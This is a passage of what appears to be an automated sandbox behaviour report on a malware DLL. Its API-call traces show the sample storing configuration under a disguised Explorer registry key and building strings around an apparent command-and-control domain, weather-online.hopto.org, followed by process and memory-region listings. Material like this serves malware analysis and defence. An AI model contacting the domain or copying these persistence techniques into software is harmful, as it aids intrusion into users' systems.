lpData=0x72f1eda8*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1edb8, lpcbData=0x20fbcc*=0x8 | out: lpType=0x20fbd4*=0x3, lpData=0x72f1edb8*, lpcbData=0x20fbcc*=0x8) returned 0x0 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1edc0, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x20fbcc*=0x4) returned 0x0 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1edc4, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1edc8, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x20fbcc*=0x4) returned 0x0 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1edcc, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x0 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1edd0, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x20fbcc*=0x4) returned 0x0 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1eddc, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x20fbd4, lpData=0x670b28, lpcbData=0x20fbcc*=0x200 | out: lpType=0x20fbd4*=0x0, lpData=0x670b28*=0x0, lpcbData=0x20fbcc*=0x200) returned 0x2 [0032.271] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1eef0, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.271] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x20fbd4, lpData=0x670d30, lpcbData=0x20fbcc*=0x64 | out: lpType=0x20fbd4*=0x3, lpData=0x670d30*, lpcbData=0x20fbcc*=0x2) returned 0x0 [0032.271] lstrlenA (lpString=" ") returned 1 [0032.271] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1edec, lpcbData=0x20fbcc*=0x104 | out: lpType=0x20fbd4*=0x3, lpData=0x72f1edec*, lpcbData=0x20fbcc*=0x0) returned 0x0 [0032.271] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1eef4, lpcbData=0x20fbcc*=0x8 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x20fbcc*=0x8) returned 0x2 [0032.271] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1eefc, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.271] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1ef00, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.271] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1eda0, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.271] RegCloseKey (hKey=0x7c) returned 0x0 [0032.271] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20fc90 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20fc90*=0x2) returned 0x0 [0032.271] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0032.271] GetLastError () returned 0x0 [0032.271] RegCloseKey (hKey=0x7c) returned 0x0 [0032.271] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20fca0 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20fca0*=0x2) returned 0x0 [0032.271] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0032.271] RegCloseKey (hKey=0x7c) returned 0x0 [0032.272] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20fc90 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20fc90*=0x2) returned 0x0 [0032.272] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0032.272] RegCloseKey (hKey=0x7c) returned 0x0 [0032.272] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20fc8c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20fc8c*=0x2) returned 0x0 [0032.272] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0032.272] RegCloseKey (hKey=0x7c) returned 0x0 [0032.272] GetLastError () returned 0x0 [0032.272] GetLastError () returned 0x0 [0032.272] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0032.272] lstrlenA (lpString="00") returned 2 [0032.272] lstrlenA (lpString="/00/") returned 4 [0032.272] wsprintfA (in: param_1=0x670da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0032.272] wsprintfA (in: param_1=0x670dc8, param_2="%s" | out: param_1="00") returned 2 [0032.272] wsprintfA (in: param_1=0x6726e0, param_2="%s" | out: param_1="/00/") returned 4 [0032.272] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0032.272] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0032.272] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20fc8c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20fc8c*=0x2) returned 0x0 [0032.272] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x670d30*, cbData=0x64 | out: lpData=0x670d30*) returned 0x0 [0032.272] RegCloseKey (hKey=0x7c) returned 0x0 [0032.274] HeapDestroy (hHeap=0x670000) returned 1 Process: id = "20" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f8e0" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 982 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 983 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 984 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 985 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 986 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 987 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 988 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 989 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 990 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 991 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 992 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 993 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 994 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 995 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 996 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 997 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 998 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 999 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1000 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1001 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1002 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1003 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1004 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1005 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1006 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1007 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1008 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 1009 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1010 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1011 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1012 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1013 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1014 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1015 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1016 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1017 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1018 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1019 start_va = 0x3a0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1020 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1021 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1022 start_va = 0x3a0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1023 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Thread: id = 46 os_tid = 0xb44 [0032.312] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fbb4 | out: lpSystemTimeAsFileTime=0x14fbb4*(dwLowDateTime=0xe0fbcd90, dwHighDateTime=0x1d3dfba)) [0032.312] GetCurrentProcessId () returned 0xb40 [0032.312] GetCurrentThreadId () returned 0xb44 [0032.312] GetTickCount () returned 0x173c8 [0032.312] QueryPerformanceCounter (in: lpPerformanceCount=0x14fbac | out: lpPerformanceCount=0x14fbac*=363372368) returned 1 [0032.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.313] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.313] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.314] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.314] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.314] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.314] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.314] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.315] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.315] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.315] GetCurrentThreadId () returned 0xb44 [0032.315] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"1\"" [0032.315] GetEnvironmentStringsW () returned 0x1d7858* [0032.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x4109f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.315] FreeEnvironmentStringsW (penv=0x1d7858) returned 1 [0032.315] GetStartupInfoA (in: lpStartupInfo=0x14fb04 | out: lpStartupInfo=0x14fb04*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.315] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.315] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.315] SetHandleCount (uNumber=0x20) returned 0x20 [0032.315] GetLastError () returned 0x0 [0032.315] SetLastError (dwErrCode=0x0) [0032.315] GetLastError () returned 0x0 [0032.316] SetLastError (dwErrCode=0x0) [0032.316] GetLastError () returned 0x0 [0032.316] SetLastError (dwErrCode=0x0) [0032.316] GetACP () returned 0x4e4 [0032.316] GetLastError () returned 0x0 [0032.316] SetLastError (dwErrCode=0x0) [0032.316] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.316] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fae4 | out: lpCPInfo=0x14fae4) returned 1 [0032.316] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f5b0 | out: lpCPInfo=0x14f5b0) returned 1 [0032.316] GetLastError () returned 0x0 [0032.316] SetLastError (dwErrCode=0x0) [0032.316] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x14f540 | out: lpCharType=0x14f540) returned 1 [0032.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f9c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f9c4, cbMultiByte=256, lpWideCharStr=0x14f328, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.316] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x14f5c4 | out: lpCharType=0x14f5c4) returned 1 [0032.316] GetLastError () returned 0x0 [0032.316] SetLastError (dwErrCode=0x0) [0032.316] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f9c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f9c4, cbMultiByte=256, lpWideCharStr=0x14f2f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ充矲狰Ā") returned 256 [0032.316] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ充矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.316] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ充矲狰Ā", cchSrc=256, lpDestStr=0x14f0e8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 